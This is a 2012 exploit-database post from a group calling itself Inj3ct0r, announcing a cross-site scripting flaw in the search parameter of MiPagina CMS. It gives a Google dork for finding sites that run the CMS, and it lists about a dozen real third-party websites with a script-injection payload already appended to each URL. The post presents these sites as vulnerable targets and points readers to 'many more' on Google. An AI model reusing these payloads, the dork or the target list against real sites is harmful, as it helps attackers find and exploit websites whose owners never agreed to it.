Home / exploitsPDF  

MiPagina CMS Cross Site Scripting

Posted on 21 April 2012

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [x] Official Website: http://www.1337day.com 0 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1 0 0 1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 1 0 I'm NuxbieCyber Member From Inj3ct0r TEAM 1 1 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 ========================================================================== <<<:>>> MiPagina - Persistent XSS Vulnerability <<:>>> ========================================================================== - Discovered By: ||| TheCyberNuxbie - Independent Security Research ||| <<< nuxbie@linuxhacktivist.com >>> CP: +62856-2538-963 [ www.linuxhacktivist.com ] $ YM: nux_exploit - Info WebApps: This CMS Develop By MiPagina: http://www.mipagina.net/ - Google Dork: inurl:"/validar_buscador_v2.php?buscar=" intext:"Con la tecnología de: Mipagina.net" - Exploit Concept: http://lokalisasi/WebApps/validar_buscador_v2.php?buscar=[XSS] - Sample Web Persistent XSS Vulnerability: http://amerilac.com/validar_buscador_v2.php?buscar=<script>alert(31337);</script> <:- 'XSS' -:> http://curaduria3bogota.com/validar_buscador_v2.php?buscar=<script>alert(31337);</script> <:- 'XSS' -:> http://publicultural.com/validar_buscador_v2.php?buscar=<script>alert(31337);</script> <:- 'XSS' -:> http://partssupply.net/validar_buscador_v2.php?buscar=<script>alert(31337);</script> <:- 'XSS' -:> http://btsecuritysa.com/validar_buscador_v2.php?buscar=<script>alert(31337);</script> <:- 'XSS' -:> http://trasegarserviciosltda.com/validar_buscador_v2.php?buscar=<script>alert(31337);</script> <:- 'XSS' -:> http://asoci.com/validar_buscador_v2.php?buscar=<script>alert(31337);</script> <:- 'XSS' -:> http://fundacionsanantonio.org/validar_buscador_v2.php?buscar=<script>alert(31337);</script> <:- 'XSS' -:> http://lacampana.co/validar_buscador_v2.php?buscar=<script>alert(31337);</script> <:- 'XSS' -:> http://ciwot.com/validar_buscador_v2.php?buscar=<script>alert(31337);</script> <:- 'XSS' -:> http://cauchoselcacique.com/validar_buscador_v2.php?buscar=<script>alert(31337);</script> <:- 'XSS' -:> http://talentum.coop/validar_buscador_v2.php?buscar=<script>alert(31337);</script> <:- 'XSS' -:> , And Many More @ Google...!!! -:>>> Special Thanks <<<:- ...:::' 1337day Inj3ct0r TEAM ':::... [ All Staff & 31337 Member Inj3ct0r TEAM ] , And All Inj3ct0r Fans & All Hacktivist,,, :-) ######################################################################### - Me @ Solo Raya, 20 April 2012 @ 21:32 PM. [ Inj3ct0r | PacketStromSecurity | Exploit-DB | Exploit-ID | Devilzc0de ] #########################################################################

 

TOP